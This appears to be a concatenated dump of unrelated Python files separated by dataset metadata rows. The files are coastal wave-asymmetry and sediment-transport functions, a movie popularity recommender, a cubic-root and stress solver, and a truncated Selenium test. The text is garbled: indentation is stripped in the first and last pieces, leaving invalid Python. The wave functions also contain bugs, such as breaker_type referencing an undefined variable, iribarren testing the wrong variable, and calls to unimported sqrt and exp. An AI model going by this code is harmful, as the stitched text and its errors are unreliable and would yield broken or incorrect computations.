# Abreu, T., Silva, P.A., Sancho, F., and Temperville (2010)
# Analytical approximate wave form for asymmetric waves.
# Coastal Engineering, 57(7):656-667.
# doi: http://dx.doi.org/10.1016/j.coastaleng.2010.02.005.
#
# Malarkey, J. and A. G. Davies (2012) Free-stream velocity descriptions
# under waves with skewness and asymmetry.
# Coastal Engineering, 68:78-95.
# doi: http://dx.doi.org/10.1016/j.coastaleng.2012.04.009.
#
# Ruessink, B. G., G. Ramaekers, and L. C. van Rijn (2012)
# On the parameterization of the free-stream non-linear wave orbital
# motion in nearshore morphodynamic models. Coastal Engineering, 6556-63.
# doi: http://dx.doi.org/10.1016/j.coastaleng.2012.03.006.
#
# van Rijn, L. C., P. K. Tonnon, and D. J. R. Walstra (2011)
# Numerical modelling of erosion and accretion of plane sloping beaches
# at different scales. Coastal Engineering, 58: 637-655.
# doi: http://dx.doi.org/10.1016/j.coastaleng.2011.01.009.
#
# <h3>Functions for calculating wave assymetry</h3>
# In[16]:
def wavelength_L(T, h):
"""
Calculate depth-dependent wavelength
Input:
T - wave period [s]
h - water depth [m]
Returns:
L - wavelength [m]
"""
g = 9.81
w = T/(2*np.pi)
kh = qkhfs(w,h)
L = g*T*T/(2*np.pi)*(np.tanh(kh))
return L
def iribarren(B, H, T, location="deepwater"):
"""
Calculate Iribarren wavenumber
Battjes, 1974
Description of breaker types
https://en.wikipedia.org/wiki/Iribarren_number
Input:
B - beach slope as fraction rise/run []
H - wave height at either deepwater or breakpoint [m]
T - wave period [s]
location - Either "deepwater" [default] or "breakpoint"
Returns:
I - Iribarren number, dimensionless number []
descr - description of breaker type [string]
"""
g = 9.81
Lo = (g*T**2)/(2*np.pi)
I = B/np.sqrt(H/Lo)
# description of breaker type
if location is "deepwater":
c = np.array((0.5, 3.3))
else:
c = np.array((0.4,2.0))
if I < c[0]:
descr = "spilling"
elif B > c[1]:
descr = "surging/collapsing"
else:
descr = "plunging"
return I, descr
def breaker_type(I,location="deepwater"):
"""
Description of breaker types
https://en.wikipedia.org/wiki/Iribarren_number
Input:
I = Iribarren number, dimensionless number
location - Either "deepwater" [default] or "breakpoint"
"""
if location is "deepwater":
c = np.array((0.5, 3.3))
else:
c = np.array((0.4,2.0))
if I < c[0]:
return "spilling"
elif B > c[1]:
return "surging/collapsing"
else:
return "plunging"
def reverse_shoal(H,T,h):
"""
Compute offshore wave height by assuming conservation of energy flux E*class
Nielsen (2009) eqn. 1.7.5
Input:
H - Wave height in intermediate depth h (not breaking) [m]
T - Wave period [s]
h - Water depth associated with H [m]
Returns:
Ho - Wave height in deepwater [m]
"""
w = 2*np.pi/T
kh = qkhfs(w,h)
Ks = 1./( np.sqrt(np.tanh(kh)*(1.+2.*kh/np.sinh(2.*kh))))
Ho = H/Ks
return Ho
def ursell( Hs, T, h ):
"""
Calculate Ursell number
Reussink et al. Eqn 6.
"""
w = 2*np.pi/T
kh = qkhfs(w,h)
k = kh/h
Ur =0.75*0.5*Hs*k/(kh)**3.
return Ur
def qkhfs( w, h ):
"""
Quick iterative calculation of kh in gravity-wave dispersion relationship
kh = qkhfs(w, h )
Input
w - angular wave frequency = 2*pi/T where T = wave period [1/s]
h - water depth [m]
Returns
kh - wavenumber * depth [ ]
Orbital velocities from kh are accurate to 3e-12 !
RL Soulsby (2006) \"Simplified calculation of wave orbital velocities\"
HR Wallingford Report TR 155, February 2006
Eqns. 12a - 14
"""
g = 9.81
x = w**2.0 *h/g
y = np.sqrt(x) * (x<1.) + x *(x>=1.)
# is this faster than a loop?
t = np.tanh( y )
y = y-( (y*t -x)/(t+y*(1.0-t**2.0)))
t = np.tanh( y )
y = y-( (y*t -x)/(t+y*(1.0-t**2.0)))
t = np.tanh( y )
y = y-( (y*t -x)/(t+y*(1.0-t**2.0)))
kh = y
return kh
def ruessink_assym( Ur ):
"""
Calculate assymetry parameters from Ursell number
rp = ruessink_assym( Ur )
Ruessink et al., 2012, Coastal Engineering 65:56-63.
"""
dtr = np.pi/180.
# Calculate B and phi from RRvR p. 58
p1 = 0.
p2 = 0.857
p3 = -0.471
p4 = 0.297
#B = p1 + (p2 - p1)/(1 + exp( (p3-log(Ur))/p4 )) # RRvR Eqn. 9
B = p1 + (p2 - p1)/(1 + np.exp( (p3-np.log10(Ur))/p4 )) # RRvR Eqn. 9, log10 per S. Suttles
p5 = 0.815
p6 = 0.672
psi = dtr*(-90.) + dtr*90. * np.tanh(p5/(Ur**p6)) # RRvR Eqn. 10.
# b can be used directly in MD equations
b = np.sqrt(2.)*B/(np.sqrt(B**2+9.)) # Solution to RRvR Eqn. 11
r = 2.*b/(b**2+1.)
phi = -psi-np.pi/2. # RRvR Eqn. 12
# dimensionless velocity and acceleration skewness
# RRvR Eqn. 5 and MD Eqn 4a,b
Su = B*np.cos(psi)
Au = B*np.sin(psi)
return (r,phi,Su,Au)
def abreu_pts(r, phi, Uw, T ):
"""
Calculate umax, umin, and phases of assymetrical wave orbital velocity
af = abreu_pts( r, phi, Uw, T )
Input:
r and phi - assymetry parameters from Ruessink et al.
Uw - amplitude of orbital velocity (m/s)
T - wave period
Returned:
T - wave period (s)
DTc - duration under crest (s)
DTt - duration under trough (s)
(T = DTc + DTt)
DTcu - duration of acceleration under crest (s)
DTtu - duratin of acceleration under trough (s)
Tzd - time of zero down-crossing (s)
Tzu - time of zero up-crossing (s)
Tc - time of maximum velocity under crest (s)
Tt = - time of minimum velocity under trough (s)
umax - maximum velocity under crest (m/s)
umin - minimum velocity under trough (m/s)
R - Velocity skewness parameter == umax/(umax-umin) ()
Beta - Acceleration skewness parameter == amax/(amax-amin) ()
Sk - van Rijn et al. 2011 (Eqn 2) assymetry statistic ()
As - van Rijn et al. 2011 (Eqn 2) assymetry statistic ()
"""
w = 2*np.pi/T
# alternative formulation Eqns 16a,b in Malarkey & Davies
phi = -phi
P = np.sqrt(1.-r*r) # same as f
b = r/(1.+P)
# Appendix E of Malarkey & Davies
# phase of umax (crest) and umin (trough) (in radians, from 0 to 2*pi)
c = b*np.sin(phi)
tmc = np.arcsin((4.*c*(b*b-c*c)+(1.-b*b)*(1.+b*b-2.*c*c))/((1.+b*b)**2-4.*c*c))
tmt = np.arcsin((4.*c*(b*b-c*c)-(1.-b*b)*(1.+b*b-2.*c*c))/((1.+b*b)**2-4.*c*c))
if(tmt<0.):
tmt = tmt+2.*np.pi
if(tmc<0.):
tmc = tmc+2*np.pi
# umax and umin - non dimensional
umax = 1.+c;
umin = umax-2.
# dimensional
umax = Uw*umax
umin = Uw*umin
# phase of zero upcrossing and downcrossing (radians)
tzu = np.arcsin(b*np.sin(phi)) # = arcsin(c)
tzd = 2.*np.arccos(c)+tzu
# Calculate assymetry parameters R and Beta
# R = umax/(umax-umin) % gives same result as:
R = 0.5*(1.+ b*np.sin(phi) ) # MD Eqn 17
# after MD Eqn. 18
Fo = (r<=.5) * (1.-0.27*(2.*r)**2.1) + (r> .5) * (0.59 + 0.14*(2.*r)**-6.2)
# MD Eqn. 15b
Br0 =(r< 0.5)* (0.5*(1+r)) + (r>=0.5)* ( 4.*r*(1.+r)/(4.*r*(1.+r)+1.) )
Beta = 0.5+(Br0-0.5)*np.sin(0.5*np.pi-np.abs(phi))*Fo/np.sin(0.5*np.pi*Fo)
# Calculate assymetry parameters Sk and As (same as van Rijn et al. 2011 Eqn. 2)
Sk = 3.*b*np.sin(phi)/np.sqrt(2.*(1.+b**2))**3
As = -3.*b*np.cos(phi)/np.sqrt(2.*(1.+b**2))**3
# (Could also use MD Appendix C to calculate uspike, aspike, and other
# measures of assymetry.)
# These are the dimensional fractions of wave periods needed by Van der A eqn.
DTc = (tzd-tzu)/w
DTt = T - DTc
DTcu = (tmc-tzu)/w
DTtu = (tmt-tzd)/w
Tzd = (tzd)/w
Tzu = (tzu)/w
Tc = (tmc)/w
Tt = (tmt)/w
return {'T':T, 'DTc':DTc, 'DTt':DTt, 'DTcu':DTcu, 'DTtu':DTtu, 'Tzd':Tzd, 'Tzu':Tzu,'Tc':Tc,'Tt':Tt, 'umax':umax,'umin':umin,'R':R,'Beta':Beta,'Sk':Sk,'As':As}
def abreu_ut ( r, phi, Uw, T, iplot=0, n=50):
"""
Calculate u(t) and a(t) using Abreu et al. (2010) eqn. 7
"""
w = 2.*np.pi/T
wt = np.linspace( 0., 2.*np.pi, n) # phase
f = np.sqrt( 1. - r**2 )
numer = np.sin(wt) + ( r*np.sin(phi)/(1.+np.sqrt(1.-r**2)) )
denom = (1.-r*np.cos(wt+phi))
ut = Uw*f*numer/denom
numer2 = np.cos(wt)-r*np.cos(phi)-r**2/(1.+np.sqrt(1.-r**2))*np.sin(phi)*np.sin(wt+phi)
at = Uw*w*f*numer2/denom**2
# dimensional values
t = wt/w
u = Uw*ut
a = Uw*w*at
if iplot:
#plot time series of velocity and acceleration
plt.plot(t,a,linewidth=2,color='firebrick',label='Acceleration')
plt.plot(t,u,linewidth=2,color='cornflowerblue',label='Velocity');
plt.ylabel('u (m/s); du/dt (m/s^2)')
plt.xlabel('Time (s)')
# find critical points and plot
af = abreu_pts( r, phi, Uw, T )
plt.plot(af['Tc'],af['umax'],marker='^',color='blue',label='umax')
plt.plot(af['Tt'],af['umin'],marker='v',color='red',label='umin')
plt.plot([ af['Tzu'], af['Tzu']+af['DTc']],[-1.2, -1.2],linewidth=4,color='blue',label='crest');
plt.plot([ af['Tzd'], af['Tzd']+af['DTt']],[-1.2, -1.2],linewidth=4,color='red',label='trough');
plt.plot([ af['Tzu'], af['Tzu']+af['DTcu']],[-1.1, -1.1],linestyle=':',linewidth=4,color='blue',label='accel');
plt.plot([ af['Tzd'], af['Tzd']+af['DTtu']],[-1.1, -1.1],linestyle=':',linewidth=4,color='red',label='decel');
plt.legend()
return wt, ut, at
def soulsby_ws( D, rhos=2650., rhow=1027., nu=1.36e-6 ):
"""
Calculate settling velocity for sand
Input:
D - grain size (m)
rhos - sediment density (kg/m3; optional, default = 2650)
rhow - water density (kg/m3; optional, default = 1027)
nu - kinematic viscosity (m2/s; optional, default = 1.36e-6)
Returns:
ws - settling velocity (m/s)
Soulsby, 1997, p. 132 - 137
"""
g = 9.81
s = rhos/rhow
Dstar = D*((g*(s-1.))/(nu*nu))**(1./3.) # eqn. 98
ws = (nu/D)*( sqrt(10.36**2+1.049*Dstar**3.) - 10.36 ) # eqn. 102
return ws
def soulsby_theta_crit( d, rhos=2650., rhow=1027., nu= 1.36e-6):
"""
Critcal Shields number (MKS units)
theta_crit = soulsby_theta_crit( d, rhos, rhow, nu )
Input (MKS units):
d - diameter (m)
rhos - sediment density (optional, default = 2650 kg/m3)
rhow - water density (optional, default = 1027 kg/m3)
nu - kinematic viscosity (optional, default = 1.36e-6 m2 s-1)
From Soulsy (1997) 'Dynamics of Marine Sands'
csherwood@usgs.gov
last revised March, 2015
"""
g = 9.81 # m s-2
s = rhos/rhow # p. 104
Dstar = d*(g*(s-1.)/(nu**2.))**(1./3.) # Eqn 75
Shields_crit = 0.3/(1.+1.2*Dstar) + 0.055*(1.-exp(-0.020*Dstar)) # Eqn 77
return Shields_crit
def od_ripple( d50, Psi ):
"""
Calculate 0'Donoghue et al. (2006) ripple geometry
Input:
d50 - median grain size (m)
Psi - mobility number, max of crest or trough flow
Returns:
Hoa - ripple height normalized by orbital amplitude A
Hoa - ripple length normalized by orbital amplitude A
van der A et al. (2013) Appendix B.
"""
d50mm = 1.e3*d50 #convert from m to mm
mL = 0.73
mH = 0.55
if(d50mm>=0.22):
fac = (d50mm-0.22)/(0.3-0.22)
mH = mH+0.45*fac
mL = mL+0.27*fac
if(d50mm>=0.3):
mH = 1.
mL = 1.
# smooth transition to upper flat bed regime
nH = 1.
if(Psi>190.):
nH = 0.5*(1.+cos( pi*(Psi-190.)/(240.-190.) ))
if(Psi>250.):
nH = 0.
nL = nH
print(mH, nH, mL, nL)
Hoa = max(0., mH*nH*(0.275-0.022*Psi**0.42) )
Loa = max(0., mL*nL*(1.97-0.44*Psi**0.21) )
return Hoa, Loa
def dsf_func(d50, theta ):
"""
Calculate sheet flow thickess
Input:
d50 - median grain size (m)
Theta - maximum (crest or trough) Shields paramter
Returns:
dsf - thickness of sheet flow layer (m)
Based on Janssen (1999) in van der A et al. (2013), Appendix C.
See also Dohmen-Janssen et al. (2001), JGR 106(C11):27,103-27,115, Eqn. 6 & 7
"""
d50mm = 1.e3*d50
deln = 25.*theta
if (d50mm > 0.15 ):
deln = deln-12.*(d50mm-0.15)/(0.2-0.15)
if (d50mm >= 0.2 ):
deln = 13.*theta
dsf=max( deln*d50, d50 ) # unstated, but assume dsf = d50 when theta = 0
return dsf
def ksd_func( d50, d90, rh=0., rl=1.e-6, theta=0. ):
"""
Calculate current-related bed roughess
zo = ksd/30
Input:
d50 - median grain size (m)
d90 - 90th percentile grain size (m)
rh - ripple height (m)
rh - ripple wavelength (m)
theta - time-averaged absolute Shields stress
Returns:
ksd - roughness (m)
Based on Ribberink (1998) in van der A et al. (2013), Appendix A.
"""
rh = max(rh,d50)
rl = max(rl,d50) # avoid divide-by-zero
# Eqn. A.2
mu = 6.
d50mm = d50*1.e3
if( d50mm > 0.15 ):
mu = 6. - 5.*(d50mm-0.15)/(0.2-0.15)
if( d50mm >= 0.2 ):
mu = 1.
# eqn A.1
ksd = max(3.*d90, d50*(mu+6.*(theta-1.))) + 0.4*rh*rh/rl
return ksd
def ksw_func( d50, rh=0., rl=1.e-6, theta=0. ):
"""
Calculate wave roughess
Input:
d50 - median grain size (m)
rh - ripple height (m)
rh - ripple wavelength (m)
theta - time-averaged absolute Shields stress
Returns:
ksw - roughness (m)
Based on Ribberink (1998) in van der A et al. (2013), Appendix A.
"""
rh = max(rh,d50)
rl = max(rl,d50) # avoid divide-by-zero
# Eqn. A.2
mu = 6.
d50mm = d50*1.e3
if( d50mm > 0.15 ):
mu = 6. - 5.*(d50mm-0.15)/(0.2-0.15)
if( d50mm >= 0.2 ):
mu = 1.
# eqn A.5
ksw = max(d50, d50*(mu+6.*(theta-1.))) + 0.4*rh*rh/rl
return ksw
def fw_func(ahat,ksw):
fw = 0.3
aksw = ahat/ksw
if aksw > 1.587:
fw = 0.00251*exp(5.21*aksw**(-0.19)) # Eqn. A4, A5
return fw
def fd_func( dsf, ksd ):
vk = 0.41
fd = 2.*(vk/log(30.*dsf/ksd))**2. # Eqn. 20
return fd
| 31.457082 | 187 | 0.547991 | 2,386 | 14,659 | 3.356245 | 0.222548 | 0.006993 | 0.006244 | 0.005994 | 0.285465 | 0.235764 | 0.201174 | 0.174076 | 0.157592 | 0.124625 | 0 | 0.08373 | 0.283034 | 14,659 | 465 | 188 | 31.524731 | 0.678211 | 0.472815 | 0 | 0.256039 | 0 | 0 | 0.046242 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082126 | false | 0 | 0.009662 | 0 | 0.183575 | 0.004831 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6223110d6703746164e9a053ac39f3e64e1c1273 | 2,587 | py | Python | popularity_model.py | HeGsnS/Recommendation_system_using_RL_RecSim | 41b2ab793a3f77ed20cc3029d70f8796e757fc80 | [
"MIT"
] | 14 | 2020-03-19T01:49:54.000Z | 2021-07-12T07:24:11.000Z | popularity_model.py | HeGsnS/Recommendation_system_using_RL_RecSim | 41b2ab793a3f77ed20cc3029d70f8796e757fc80 | [
"MIT"
] | 1 | 2020-04-07T08:38:46.000Z | 2020-04-07T08:38:46.000Z | popularity_model.py | HeGsnS/Recommendation_system_using_RL_RecSim | 41b2ab793a3f77ed20cc3029d70f8796e757fc80 | [
"MIT"
] | 8 | 2020-03-16T04:56:03.000Z | 2021-11-08T11:27:44.000Z | import numpy as np
import pandas as pd
class PopularityRecommender:
def __init__(self,user_data,slate_size,mode = "0"):
self.user_data = user_data
print("total unique movie ",len(np.unique(user_data["movieId"].values)))
self.slate_size = slate_size
self.mode = mode
self.positive_rating_count,self.avg_rating_count = self.generate_popularity_table()
def generate_popularity_table(self):
positive_data = self.user_data[self.user_data['rating'] > 3]
items_positive_data_count = positive_data.groupby('movieId').size().reset_index()
items_positive_data_count.columns = ['movieId', 'number of positive rating']
item_data_average_rating = self.user_data[['movieId','rating']].groupby('movieId').mean().reset_index()
item_data_average_rating.columns = ['movieId','avg_rating']
return [items_positive_data_count,item_data_average_rating]
def step(self,reward,observation):
doc = observation['doc']
user = observation['user']
user_id = user['user_id']
user_past_record_ids = user['record_ids']
user_past_record = user['past_record']
doc_ids = list(doc.keys())
score_list = np.zeros(len(doc_ids))
# print("doc ids : ",doc_ids)
if self.mode == "0":
# print('option 0 ')
use_dataset = self.positive_rating_count
# print("total unique movie id : ",len(use_dataset["movieId"].values))
else:
# print("option 1")
use_dataset = self.avg_rating_count
# print("total unique movie id : ", len(use_dataset["movieId"].values))
for index in range(len(doc_ids)):
id = doc_ids[index]
movie = use_dataset[use_dataset["movieId"] == int(id) ]
# print("movie info : ",movie)
movie = movie[use_dataset.columns[-1]].values
# print("count : ",movie)
if (len(movie) == 0):
score_list[index] = -1
else:
score_list[index] = movie[0]
score_list = np.asarray(score_list, dtype=np.float32)
# print("score lsit ",score_list)
# print("list of best index : ",score_list.argsort()[::-1])
return score_list.argsort()[::-1][:self.slate_size]
# sort_docs = use_dataset[use_dataset["movieId"].isin(doc_ids)].sort_values(by=[use_dataset.columns[-1]],ascending=False)
# result_doc_ids = sort_docs['movieId'].valuesp[:self.slate_size]
# result_index = np.where(doc_ids.isin(result_doc_ids))
| 41.063492 | 129 | 0.625435 | 328 | 2,587 | 4.64939 | 0.246951 | 0.039344 | 0.039344 | 0.041311 | 0.114098 | 0.078689 | 0.078689 | 0.078689 | 0.078689 | 0.078689 | 0 | 0.007136 | 0.241593 | 2,587 | 62 | 130 | 41.725806 | 0.770133 | 0.225744 | 0 | 0.052632 | 0 | 0 | 0.076536 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.052632 | 0 | 0.210526 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62237b9631ffb63f2a66aaa5496eaad99329fedc | 11,332 | py | Python | slippy/core/_stress_utils.py | FrictionTribologyEnigma/slippy | 9423a3f81e385309ffb483bab517c3d1157aba36 | [
"MIT"
] | 12 | 2020-12-06T15:30:06.000Z | 2021-12-14T06:37:15.000Z | slippy/core/_stress_utils.py | pauliwu/slippy | 9423a3f81e385309ffb483bab517c3d1157aba36 | [
"MIT"
] | null | null | null | slippy/core/_stress_utils.py | pauliwu/slippy | 9423a3f81e385309ffb483bab517c3d1157aba36 | [
"MIT"
] | 5 | 2021-03-18T05:53:11.000Z | 2022-02-16T15:18:43.000Z | import numpy as np
import numba
import slippy
from collections.abc import Sequence
__all__ = ['get_derived_stresses', 'solve_cubic']
_cuda_cubic_cache = {}
try:
import cupy as cp
def _make_cuda_cubic_solver(dtype):
eps = slippy.CUBIC_EPS
s_dtype = str(dtype)
if not s_dtype.startswith("float"):
raise ValueError("can only make cubic solver for single and double floats")
single = 'f' if str(s_dtype).endswith('32') else ''
if not single and not str(s_dtype).endswith('64'):
raise ValueError("can only make cubic solver for single and double floats")
cubic_kernel = cp.ElementwiseKernel(
"T b, T c, T d", "T r1, T r2, T r3",
f'''
if (fabs{single}(d) < {eps}) {{
// cancel and find remaining roots by quadratic formula
r1 = 0;
T diff = sqrt{single}(b*b-4*c)/2;
r2 = (-b)/2 + diff;
r3 = (-b)/2 - diff;
}} else {{
// convert to depressed cubic
T p = c-b*b/3;
T q = 2*b*b*b/27 - b*c/3 + d;
if (fabs{single}(p) < {eps}) {{
r1 = cbrt{single}(-q) - b/3;
r2 = r1;
r3 = r1;
}} else if (fabs{single}(q) < {eps}) {{
r3 = - b/3;
if (p<0) {{
T diff = sqrt{single}(-p);
r2 = diff - b/3;
r1 = - diff - b/3;
}} else {{
r1 = r3;
r2 = r3;
}}
}} else {{
T e = q*q/4 + p*p*p/27;
if (fabs{single}(e) < {eps}) {{ // two roots
r2 = -1.5*q/p - b/3;
r3 = 3*q/p - b/3;
T f_prime2 = 3*r2*r3 + 2*b*r2+c;
T f_prime3 = 3*r3*r3 + 2*b*r3+c;
if (fabs{single}(f_prime2) < fabs{single}(f_prime3)) {{
r1 = r2;
}} else {{
r1 = r3;
}}
}} else if (e>0) {{
// one root
T u = cbrt{single}(-q/2 - sqrt{single}(e));
r1 = u - p/(3*u) - b/3;
r2 = r1;
r3 = r1;
}} else {{
T u = 2*sqrt{single}(-p/3);
T t = acos{single}(3*q/p/u)/3;
T k = 2*3.14159265358979311599796346854/3;
r1 = u*cos{single}(t) - b/3;
r2 = u*cos{single}(t-k) - b/3;
r3 = u*cos{single}(t-2*k) - b/3;
}}
}}
}}
// sort the roots
T temp;
if (r1<r2) {{
if (r2>r3) {{
if (r1<r3) {{
temp = r2;
r2 = r3;
r3 = temp;
}} else {{
temp = r1;
r1 = r3;
r3 = r2;
r2 = temp;
}}
}}
}} else {{
if (r2<r3) {{
if (r1<r3) {{
temp = r1;
r1 = r2;
r2 = temp;
}} else {{
temp = r1;
r1 = r2;
r2 = r3;
r3 = temp;
}}
}} else {{
temp = r1;
r1 = r3;
r3 = temp;
}}
}}
return;
''', 'solve_cubic', return_tuple=True)
return cubic_kernel
def _solve_cubic_cuda(b, c, d):
assert isinstance(b, cp.ndarray) and isinstance(c, cp.ndarray) and isinstance(d, cp.ndarray), \
"Arrays must all be cupy arrays"
assert b.dtype == c.dtype == d.dtype, "Array dtypes must match"
if b.dtype not in _cuda_cubic_cache:
_cuda_cubic_cache[b.dtype] = _make_cuda_cubic_solver(b.dtype)
return _cuda_cubic_cache[b.dtype](b, c, d)
except ImportError:
cp = None
_solve_cubic_cuda = None
def _make_numba_cubic_solver(dtype):
eps = slippy.CUBIC_EPS
s_dtype = str(dtype)
if not s_dtype.startswith("float"):
raise ValueError("can only make cubic solver for single and double floats")
def solve_cubic_numba_base(b, c, d, r1, r2, r3):
for i in range(len(b)):
if np.abs(d[i]) < eps:
# cancel and find remaining roots by quadratic formula
r1[i] = 0
diff = np.sqrt(b[i] * b[i] - 4 * c[i]) / 2
r2[i] = (-b[i]) / 2 + diff
r3[i] = (-b[i]) / 2 - diff
else:
# convert to depressed cubic
p = c[i] - b[i] ** 2 / 3
q = 2 * b[i] ** 3 / 27 - b[i] * c[i] / 3 + d[i]
if np.abs(p) < eps:
r1[i] = np.sign(-q) * np.abs(q) ** (1 / 3) - b[i] / 3
r2[i] = r1[i]
r3[i] = r1[i]
elif np.abs(q) < eps:
r3[i] = - b[i] / 3
if p < 0:
diff = np.sqrt(-p)
r2[i] = diff - b[i] / 3
r1[i] = - diff - b[i] / 3
else:
r1[i] = r3[i]
r2[i] = r3[i]
else:
e = q * q / 4 + p * p * p / 27
if np.abs(e) < eps:
r2[i] = -1.5 * q / p - b[i] / 3
r3[i] = 3 * q / p - b[i] / 3
f_prime2 = 3 * r2[i] ** 2 + 2 * b[i] * r2[i] + c[i]
f_prime3 = 3 * r3[i] ** 2 + 2 * b[i] * r3[i] + c[i]
if np.abs(f_prime2) < np.abs(f_prime3):
r1[i] = r2[i]
else:
r1[i] = r3[i]
elif e > 0:
u = -q / 2 - np.sqrt(e)
u = np.sign(u) * np.abs(u) ** (1 / 3)
r1[i] = u - p / (3 * u) - b[i] / 3
r2[i] = r1[i]
r3[i] = r1[i]
else:
u = 2 * np.sqrt(-p / 3)
t = np.arccos(3 * q / p / u) / 3
k = 2 * np.pi / 3
r1[i] = u * np.cos(t) - b[i] / 3
r2[i] = u * np.cos(t - k) - b[i] / 3
r3[i] = u * np.cos(t - 2 * k) - b[i] / 3
# sort the array
r1[i], r2[i], r3[i] = np.sort(np.array([r1[i], r2[i], r3[i]]))
numba_type = numba.__getattribute__(s_dtype)
raw_func = numba.guvectorize([(numba_type[:], numba_type[:], numba_type[:],
numba_type[:], numba_type[:], numba_type[:])],
"(n),(n),(n)->(n),(n),(n)",
nopython=True)(solve_cubic_numba_base)
def full_func(b, c, d):
r1 = np.zeros_like(b)
r2 = np.zeros_like(b)
r3 = np.zeros_like(b)
raw_func(b, c, d, r1, r2, r3)
return r1, r2, r3
return full_func
_numba_cubic_cache = {}
def _solve_cubic_numba(b, c, d):
assert isinstance(b, np.ndarray) and isinstance(c, np.ndarray) and isinstance(d, np.ndarray), \
"Arrays must all be numpy arrays"
assert b.dtype == c.dtype == d.dtype, "Array dtypes must match"
if b.dtype not in _numba_cubic_cache:
_numba_cubic_cache[b.dtype] = _make_numba_cubic_solver(b.dtype)
return _numba_cubic_cache[b.dtype](b, c, d)
def solve_cubic(b, c, d):
""" Find roots of cubic equation x^3 + bx^2 + cx + d = 0
Parameters
----------
b, c, d: either numpy or cupy arrays
Equation coefficients, must all have the same dtype and the same shape, currently supports any floats for numpy
arrays and single or double floats for cupy arrays
Returns
-------
r1, r2, r3: arrays
Roots of the equation in ascending size order, arrays will match size, type and dtype of the input. All arrays
will always be filled, if only a single root is found this will be repeated, where there are 2 roots, the root
which does not represent a zero crossing will be repeated.
Notes
-----
Both the cuda and numba versions use just in time compilation, functions are also cached for future calls
"""
if isinstance(b, np.ndarray):
return _solve_cubic_numba(b, c, d)
elif cp is not None:
if isinstance(b, cp.ndarray):
return _solve_cubic_cuda(b, c, d)
raise TypeError(f"Cannot solve cubic, unrecognised type {str(type(b))}")
def get_derived_stresses(tensor_components: dict, required_components: Sequence, delete: bool = True) -> dict:
"""Finds derived stress terms from the full stress tensor
Parameters
----------
tensor_components: dict
The stress tensor components must have keys: 'xx', 'yy', 'zz', 'xy', 'yz', 'xz' all should be equal size
arrays
required_components: Sequence
The required derived stresses, valid items are: '1', '2', '3' and/or 'vm', relating to principal stresses and
von mises stress respectively. If tensor components are also present these will not be deleted if delete is
set to True
delete: bool, optional (True)
If True the tensor components will be deleted after computation with the exception of components who's names
are in required_components
Returns
-------
dict of derived components
"""
if not all([rc in {'1', '2', '3', 'vm'} for rc in required_components]):
raise ValueError("Unrecognised derived stress component, allowed components are: '1', '2', '3', 'vm'")
if isinstance(tensor_components['xx'], np.ndarray):
xp = np
else:
try:
float(tensor_components['xx'])
xp = np
except TypeError:
xp = slippy.xp
rtn_dict = dict()
if 'vm' in required_components:
rtn_dict['vm'] = xp.sqrt(((tensor_components['xx'] - tensor_components['yy']) ** 2 +
(tensor_components['yy'] - tensor_components['zz']) ** 2 +
(tensor_components['zz'] - tensor_components['xx']) ** 2 +
6 * (tensor_components['xy'] ** 2 +
tensor_components['yz'] ** 2 +
tensor_components['xz'] ** 2)) / 2)
if '1' in required_components or '2' in required_components or '3' in required_components:
b = -(tensor_components['xx'] + tensor_components['yy'] + tensor_components['zz'])
c = (tensor_components['xx'] * tensor_components['yy'] +
tensor_components['yy'] * tensor_components['zz'] +
tensor_components['xx'] * tensor_components['zz'] -
tensor_components['xy'] ** 2 - tensor_components['xz'] ** 2 - tensor_components[
'yz'] ** 2)
d = -((tensor_components['xx'] * tensor_components['yy'] * tensor_components['zz'] +
2 * tensor_components['xy'] * tensor_components['xz'] * tensor_components['yz'] -
tensor_components['xx'] * tensor_components['yz'] ** 2 -
tensor_components['yy'] * tensor_components['xz'] ** 2 -
tensor_components['zz'] * tensor_components['xy'] ** 2))
rtn_dict['3'], rtn_dict['2'], rtn_dict['1'] = solve_cubic(b, c, d)
return rtn_dict
| 38.413559 | 119 | 0.465849 | 1,482 | 11,332 | 3.452767 | 0.149123 | 0.125073 | 0.007035 | 0.028141 | 0.387141 | 0.307407 | 0.236662 | 0.185069 | 0.174907 | 0.135822 | 0 | 0.042916 | 0.399576 | 11,332 | 294 | 120 | 38.544218 | 0.709142 | 0.135634 | 0 | 0.308696 | 0 | 0.008696 | 0.325184 | 0.018129 | 0 | 0 | 0 | 0 | 0.017391 | 1 | 0.034783 | false | 0 | 0.026087 | 0 | 0.095652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62243587267acb026051d3bbf9e015260495fca0 | 890 | py | Python | src/tests/test_FormAprobarDocumento.py | DaniDuran/Selenium_Inmofianza | bc1e9643cb720057f8e49a695f70df9e3c7a511c | [
"MIT"
] | 1 | 2021-12-17T05:18:47.000Z | 2021-12-17T05:18:47.000Z | src/tests/test_FormAprobarDocumento.py | daninarvaezr/SeleniumInmofianza | 51d488043188b87199dbf28b9f7ef6d43f5163d9 | [
"MIT"
] | null | null | null | src/tests/test_FormAprobarDocumento.py | daninarvaezr/SeleniumInmofianza | 51d488043188b87199dbf28b9f7ef6d43f5163d9 | [
"MIT"
] | null | null | null | import selenium
from functions.Functions import Functions as Selenium
import unittest
from classes.FormLogin import EventLogin
from classes.FormTerminosCondiciones import EventTerminosCondiciones as EventTC
from classes.FormAprobacionDocumentos import EventAprobarDocumentos as EventAD
class AprobacionDocumento(Selenium,unittest.TestCase):
def setUp(self):
Selenium.abrir_navegador(self)
Selenium.get_json_file(self,"AprobacionDocumentos")
self.driver.maximize_window()
def testAprobarDocumento(self):
